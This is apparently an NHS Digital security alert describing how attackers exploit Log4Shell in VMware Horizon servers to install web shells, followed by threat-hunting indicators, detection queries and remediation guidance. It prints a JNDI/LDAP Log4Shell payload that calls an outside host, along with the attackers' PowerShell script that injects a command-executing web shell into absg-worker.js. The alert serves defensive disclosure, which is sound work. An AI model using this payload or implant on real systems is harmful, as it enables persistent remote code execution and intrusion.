Skip to main content

Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells

Attackers are actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish web shells.

Report a cyber attack: call 0300 303 5222 or email carecert@nhsdigital.nhs.uk

Summary

Attackers are actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish web shells.


Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.

The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure.

Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.

The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.


NHS Digital response to Log4Shell

This alert is part of NHS Digital's wider response to the Log4Shell remote code execution vulnerability. For more information on Log4Shell itself, please visit our cyber alerts article Log4Shell RCE Vulnerability CC-3989.
 

Additional VMware systems may be vulnerable and affected organisations should regularly review the VMSA-2021-0028 security advisory: VMware Response to Apache Log4j Remote Code Execution Vulnerability.  NHS and social care organisations are invited to use the Cyber Associates Network to find out additional information and participate in discussion about the Log4Shell remote code execution vulnerability and affected VM products.


Attack details

The attack is very likely initiated via a Log4Shell payload similar to ${jndi:ldap://example.com}. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:

Malicious PowerShell script

powershell -c "$path=gwmi win32_service|?{$.Name -like """VMBlastSG"""}|%{$.PathName -replace '"""', '' -replace """nssm.exe""","""lib\absg-worker.js"""};

The executed command invokes Get-WMIObject on win32_service, returning a list of service names containing 'VMBlastSG'. It identifies the file path for the service, replaces instances of 'nssm.exe' with 'lib/absg-worker.js' and writes this path to $path, thereby identifying the location of the 'absg-worker.js' file for the targeted VMware Horizon instance.

$expr="""req.connection.end();

if(String(req.url).includes('REDACTED')) {try {replyError(req, res, 200, require('child_process').execSync(Buffer.from(req.headers['data'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());

catch (err) {replyError(req, res, 400, err.stderr.toString());

return;""";

This writes a code block to $expr that listens for any web requests containing a specific, hardcoded string in the URI before executing arbitrary commands contained in the 'data' header object. The output is delivered to the attacker via 'replyError' where requests contained the specified string, otherwise a standard error message is returned.

(Get-Content $path)|ForEach-Object {$_ -replace """req.connection.end()\;""", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG"

Retrieves the list of service path names stored in $path and for each replaces any instances of "req.connection.end()\;" with the code block stored in $expr described above, thereby injecting the web shell. The altered 'absg-worker.js' file then contains:

codeblock

The 'VMBLastSG' service is then forcibly restarted to initiate the listener.

Once established, the listener will execute arbitrary commands received in crafted web (HTTP / HTTPS) requests if a particular hardcoded string (key) is present in the URI of the request. The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.

A representative diagram of the attack is provided below:

Process diagram of malicious attack


Image description
  1. Log4Shell payload queries VMware Horizon server.
  2. Horizon server calls back over LDAP protocol and pulls malicious Java class.
  3. Malicious Java class executes PowerShell script, spawned from VMware Horizon's ws_tomcatService.exe
  4. PowerShell script injects a web shell to absg-worker.js, and restarts VMBlastSG service.
  5. Listener created using Blast Secure Gateway for any IP address on port 8443.
  6. Stealthy persistence method established. Awaiting presence of specific key in attacker-invoked URI.

Threat Hunting Advice

Organisations should look for the following:

  • Evidence of ws_TomcatService.exe spawning abnormal processes
  • Any powershell.exe processes containing ‘VMBlastSG’ in the commandline
  • File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ - This file is generally overwritten during upgrades, and not modified

Any organisations that detect anomalous activity fitting the above patterns should contact CSOC via 0300 303 5222 or email carecert@nhsdigital.nhs.uk


PowerShell command to detect file modification

$path=gwmi win32_service|?{$_.Name -like "*VMBlastSG*"}|%{$_.PathName -replace "nssm.exe","lib\absg-worker.js"};gc $path.Replace("`"", "")|Select-String "req.headers\[\'data\'\]"

Microsoft Defender for Endpoint query to detect abnormal child processes spawned by ws_TomcatService.exe

DeviceProcessEvents

| where InitiatingProcessFileName =~ "ws_TomcatService.exe"

| where FileName != "repadmin.exe"

Microsoft Defender for Endpoint query to detect powershell.exe processes with 'VMBlastSG' in the command line

DeviceProcessEvents

where FileName =~ "powershell.exe"

where ProcessCommandLine has "VMBlastSG"

Remediation steps

Type Step
Guidance

Affected organisations should review the VMware Horizon section of the VMware security advisory VMSA-2021-0028 and apply the relevant updates or mitigations immediately or subsequently consult the NHS Digital High Severity Cyber Alert CC-3995.

 



Definitive source of threat updates


Last edited: 24 January 2022 2:39 pm